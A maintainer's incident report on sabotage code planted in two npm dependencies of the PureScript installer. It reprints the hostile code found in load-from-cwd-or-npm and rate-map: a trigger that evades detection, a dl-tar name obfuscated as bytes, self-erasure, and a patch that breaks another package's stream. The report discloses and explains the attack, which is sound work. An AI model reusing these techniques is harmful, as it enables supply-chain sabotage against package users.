Malicious code in the PureScript npm installer

Earlier this week, I found and addressed some malicious code in the purescript npm installer. The malicious code was inserted into dependencies of the installer: specifically, packages maintained by @shinnn, the original author of the purescript npm installer and, until around a month ago, its maintainer.

There’s some important background context I should explain first: after a few too many disagreements and unpleasant conversations with @shinnn about the maintenance of the purescript npm installer, we (the compiler maintainers) recently decided that it would be better if we maintained it ourselves, and asked him if he would transfer the purescript package on npm to us. He begrudgingly did so. The 0.13.2 PureScript compiler release, which we cut last week, is the first release of the compiler since we took over the purescript npm package.

Quick summary

update: npm have responded:

The maintainer of rate-map and load-from-cwd-or-npm has replied and informed us that they had not published the packages and feared that their account had been compromised.

We have removed rate-map@1.0.3 and load-from-cwd-or-npm@3.0.2 from the registry.

The maintainer also published install-purescript-cli@0.5.1, whose dependencies are pinned to load-from-cwd-or-npm@3.0.1 and rate-map@1.0.2. This was done to prevent purescript v0.12.x from installing malicious versions of load-from-cwd-or-npm and rate-map.

Where did the malicious code come from?

The code was inserted first into the npm package load-from-cwd-or-npm at version 3.0.2, and later into the npm package rate-map starting at version 1.0.3. A number of versions of both of these packages were published over the last few days, and many of them have now been unpublished. As far as I can tell the only remaining version of load-from-cwd-or-npm including any malicious code is 3.0.2, and the only remaining version of rate-map including any malicious code is version 1.0.3.

update: npm have now removed both load-from-cwd-or-npm@3.0.2 and rate-map@1.0.3 from the registry.

What did it do?

In short, the code sabotages the purescript npm installer to prevent the download from completing, making the installer hang during the “Check if a prebuilt binary is provided for your platform” step. The first version of the exploit did this by breaking the load-from-cwd-or-npm package so that any call to loadFromCwdOrNpm() would produce the PassThrough stream constructor instead of the package we were expecting (in this case, the request package, which we were using for downloading compiler binaries). The second version did this by modifying a source file to prevent a download callback from firing. I’ve gone into more detail at the bottom of the post.

Timeline

This is my current understanding of what happened:

How has this been addressed?

As of v0.2.5 of the purescript-installer package, we have dropped all dependencies which are maintained by @shinnn. We have also marked all earlier versions of purescript-installer as deprecated.

If you install the purescript npm package at any version before 0.13.2, you will still be pulling in packages maintained by @shinnn. I’d suggest updating as soon as possible, or if you are still using 0.12.x, installing via some other means. We are currently talking with npm’s security team about how best to resolve the issue of previous versions of the purescript package.
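If you want to check whether a project has already pulled in one of the versions named in this post, something like the following sketch may help. It assumes a parsed lockfile in the nested `dependencies` layout (npm lockfileVersion 1); the `findAffected` helper and the sample lockfile contents are hypothetical, and the list only covers the two versions identified above, not the ones that were unpublished earlier.

```javascript
// Versions named in this post as containing malicious code.
const KNOWN_BAD = {
  "load-from-cwd-or-npm": ["3.0.2"],
  "rate-map": ["1.0.3"]
};

// Hypothetical helper: recursively walks the nested `dependencies`
// objects of a parsed lockfile and collects any name@version matches.
function findAffected(node, found = []) {
  for (const [name, info] of Object.entries(node.dependencies || {})) {
    if ((KNOWN_BAD[name] || []).includes(info.version)) {
      found.push(`${name}@${info.version}`);
    }
    findAffected(info, found);
  }
  return found;
}

// Made-up lockfile contents, purely for illustration.
const sampleLock = {
  dependencies: {
    "some-installer": {
      version: "1.0.0",
      dependencies: {
        "rate-map": { version: "1.0.3" },
        "load-from-cwd-or-npm": { version: "3.0.1" }
      }
    }
  }
};

const affected = findAffected(sampleLock);
console.log(affected);
```

For a real project you would pass in the result of parsing your own package-lock.json instead of `sampleLock`.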

How did the exploits work?

I’ve archived, in a gist, complete copies of the packages that I’ve identified as including the malicious code.

Exploit version 1: load-from-cwd-or-npm

The first version of the exploit, in load-from-cwd-or-npm@3.0.2, occurs in lines 50 to 83 of index.js:

  const tasks = [PassThrough];

  if (argLen === 2) {
    if (typeof args[1] !== 'function') {
      throw new TypeError(`Expected a function to compare two package versions, but got ${
        inspectWithKind(args[1])
      }.`);
    }
  } else {
    tasks.unshift(resolveSemverFromNpm);
  }

  tasks.unshift(resolveFromNpm(modulePkgId));

  try {
    const results = await Promise.all(tasks);
    let parent = module;

    do {
      parent = parent.parent;

      try {
        const {path} = parent;

        if (path.endsWith('cli') || [path, dirname(path)].some(dir => existsSync(resolve(dir, '.git')))) {
          parent = 'npm';
          break;
        }
      } catch (_) {}
    } while (parent);

    if (typeof parent !== 'string') {
      return results[2];
    }

This code is a little obfuscated but it didn’t take too long for me to work out what it is doing.

The tasks array initially contains just the PassThrough stream constructor. In the usual case, where no comparison function is passed as a second argument, the code then calls tasks.unshift twice so that the PassThrough constructor ends up at index 2 in the tasks array. This will be important later.
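To make the ordering concrete, here is a minimal sketch that uses strings as stand-ins for the real entries (the strings are placeholders, not the actual functions or promises from the package). It assumes the path where no comparison function is passed, so both unshift calls run.

```javascript
// Placeholder strings stand in for the real entries of the tasks array.
const tasks = ["PassThrough"];

// Each unshift inserts at the front, pushing earlier entries back by one.
tasks.unshift("resolveSemverFromNpm");
tasks.unshift("resolveFromNpm(modulePkgId)");

const passThroughIndex = tasks.indexOf("PassThrough");
console.log(tasks, passThroughIndex);
```

Promise.all preserves the order of its input, so whatever sits at index 2 of tasks is what later comes back as results[2].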

The do-while loop works its way up the require chain to try to find out how the code is being run, by repeatedly following the parent property of each module in the chain. Then, we have this condition:

    if (
      path.endsWith("cli") ||
      [path, dirname(path)].some(dir => existsSync(resolve(dir, ".git")))
    )

The purpose of this condition appears to be to decide whether or not to activate the malicious code. As far as I can tell, the path.endsWith("cli") check is designed to evaluate to true on older versions of the purescript npm installer. Before we took over, the purescript npm package depended on the install-purescript-cli package, which is maintained by @shinnn; in the most recent version of purescript, this dependency has been replaced with the purescript-installer package, which we maintain. When the check is true the exploit is switched off, so its purpose seems to be to ensure that the malicious code only runs when our installer is being used (and not @shinnn’s).

The second condition is checking whether there is a .git directory alongside the file. The purpose of this is presumably to avoid activating the malicious code when the installer is being run out of a git working directory, to make it harder to reproduce and track down.
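Here is a rough sketch of how the two checks behave, run against mock module objects rather than a real require chain. The `isSuppressed` helper, the directory paths, and the injected `existsSync` stand-ins are all hypothetical; only the loop body mirrors the code above.

```javascript
const { dirname, resolve } = require("path");

// Hypothetical helper mirroring the loop: returns true when the checks
// would switch the payload off for this chain of modules.
function isSuppressed(startModule, existsSync) {
  let parent = startModule;
  do {
    parent = parent.parent;
    try {
      // Throws once we run off the top of the chain; the error is swallowed.
      const { path } = parent;
      if (
        path.endsWith("cli") ||
        [path, dirname(path)].some(dir => existsSync(resolve(dir, ".git")))
      ) {
        return true;
      }
    } catch (_) {}
  } while (parent);
  return false;
}

// Mock chains with made-up directories.
const viaOldInstaller = {
  parent: { path: "/app/node_modules/install-purescript-cli", parent: null }
};
const viaNewInstaller = {
  parent: { path: "/app/node_modules/purescript-installer", parent: null }
};

const noGitAnywhere = () => false;
const gitInInstallerDir = p =>
  p === resolve("/app/node_modules/purescript-installer", ".git");

console.log(isSuppressed(viaOldInstaller, noGitAnywhere));
console.log(isSuppressed(viaNewInstaller, noGitAnywhere));
console.log(isSuppressed(viaNewInstaller, gitInInstallerDir));
```

In this sketch only the second call returns false, which corresponds to the case where the payload would be allowed to run: the new installer, with no .git directory nearby.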

The purpose of the parent variable at this stage is just to indicate whether the malicious code should run or not: if the exploit should be run, then parent will be undefined, but if it shouldn’t, then it will be set to the string "npm". We then have this if statement:

    if (typeof parent !== 'string') {
      return results[2];
    }

which just returns the PassThrough constructor in the case where the malicious code is being run; note that there are no other references to results[2] in the source file.

The effect of this is that when we do loadFromCwdOrNpm("request"), we get the PassThrough constructor. So when we have code along the lines of

const request = await loadFromCwdOrNpm("request");
request("https://github.com/.../archive.tar.gz").pipe(...);

nothing happens; no HTTP request is performed.
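The effect can be reproduced in isolation with a small sketch. Here `request` is simply bound to the PassThrough constructor, standing in for what the sabotaged loader handed back; the URL is a placeholder, and I pass it in an options object (a calling style request also supports) rather than as a bare string.

```javascript
const { PassThrough } = require("stream");

// Stand-in for the value returned in place of the real request package.
const request = PassThrough;

// Calling the constructor without `new` still yields a stream instance.
// The options object is treated as stream options; no network I/O happens.
const response = request({ url: "https://example.invalid/archive.tar.gz" });

const isPlainStream = response instanceof PassThrough;
// Nothing ever writes to this stream, so there is nothing to read.
const firstChunk = response.read();

console.log(isPlainStream, firstChunk);
```

Anything piped from `response` just waits for data that never arrives, which matches the hang we saw in the installer.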

Exploit version 2: rate-map

rate-map@1.0.3 includes the same do-while loop to control whether or not the exploit runs, although it also includes some interesting modifications.

let parent = module;
const {
  existsSync: existsSync,
  readFileSync: readFileSync,
  writeFileSync: writeFileSync
} = require("fs");
do {
  parent = parent.parent;
  try {
    const { path: path } = parent;
    if (
      path.endsWith("cli") ||
      [path, dirname(path)].some(dir => existsSync(resolve(dir, ".git")))
    ) {
      parent = "npm";
      break;
    }
  } catch (_) {}
} while (parent);
if (typeof parent !== "string") {
  const px = require.resolve(
    Buffer.from([100, 108, 45, 116, 97, 114]).toString()
  );
  try {
    writeFileSync(
      __filename,
      readFileSync(__filename, "utf8").replace(
        /let parent[^\0]*module\.exports/u,
        "module.exports"
      )
    );
  } catch (_) {}
  try {
    writeFileSync(
      px,
      readFileSync(px, "utf8").replace(/\n\s*cb\(null, chunk\);/u, "")
    );
  } catch (_) {}
}

After the do-while loop, in the case where the exploit code is going to run, it first resolves the path of the dl-tar package on the local filesystem; note the use of Buffer.from to obscure this:

> Buffer.from([100, 108, 45, 116, 97, 114]).toString()
'dl-tar'

The file path of index.js from the dl-tar package will now be stored in the px variable. Then, we have this:

  try {
    writeFileSync(
      __filename,
      readFileSync(__filename, "utf8").replace(
        /let parent[^\0]*module\.exports/u,
        "module.exports"
      )
    );
  } catch (_) {}

which rewrites the current file to remove the malicious code, presumably also in order to make this exploit harder to track down. Finally, we have this:

  try {
    writeFileSync(
      px,
      readFileSync(px, "utf8").replace(/\n\s*cb\(null, chunk\);/u, "")
    );
  } catch (_) {}

which removes the first piece of text in dl-tar’s index.js file that matches the regular expression /\n\s*cb\(null, chunk\);/ (the expression has no g flag, so only the first match is replaced). When running this code against dl-tar@0.8.0, the latest version at the time of writing, it produces the following diff:

--- a/home/harry/code/purescript-npm-installer/dl-tar/index.js
+++ b/node_modules/purescript-installer/dl-tar/index.js
@@ -205,7 +205,6 @@ module.exports = function dlTar(...args) {
   new Transform({
     transform(chunk, encoding, cb) {
       unpackStream.responseBytes += chunk.length;
-      cb(null, chunk);
     }
   }),
   unpackStream

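that is, it removes the call to cb. Without that call, the Transform stream never forwards the chunk or signals that it is ready for the next one, so nothing flows downstream and the subscribers to dlTar won’t fire.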
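A minimal sketch of the stall, independent of dl-tar: the hypothetical `makeCounter` helper below builds a byte-counting Transform similar in shape to the one in the diff, with a flag that controls whether the callback is invoked.

```javascript
const { Transform } = require("stream");

// Hypothetical helper: builds a byte-counting Transform. `forward`
// controls whether cb is called, mimicking the file before and after
// the malicious edit.
function makeCounter(forward) {
  const stats = { calls: 0, bytes: 0 };
  const stream = new Transform({
    transform(chunk, encoding, cb) {
      stats.calls += 1;
      stats.bytes += chunk.length;
      if (forward) cb(null, chunk);
    }
  });
  return { stream, stats };
}

const healthy = makeCounter(true);
const sabotaged = makeCounter(false);

// Write the same two one-byte chunks to each stream.
for (const { stream } of [healthy, sabotaged]) {
  stream.write("a");
  stream.write("b");
}

console.log(healthy.stats.calls, healthy.stream.readableLength);
console.log(sabotaged.stats.calls, sabotaged.stream.readableLength);
```

The intact stream processes both chunks and buffers two bytes for its reader, while the sabotaged one only ever sees the first chunk and buffers nothing: the second write sits in the queue waiting for a callback that never comes.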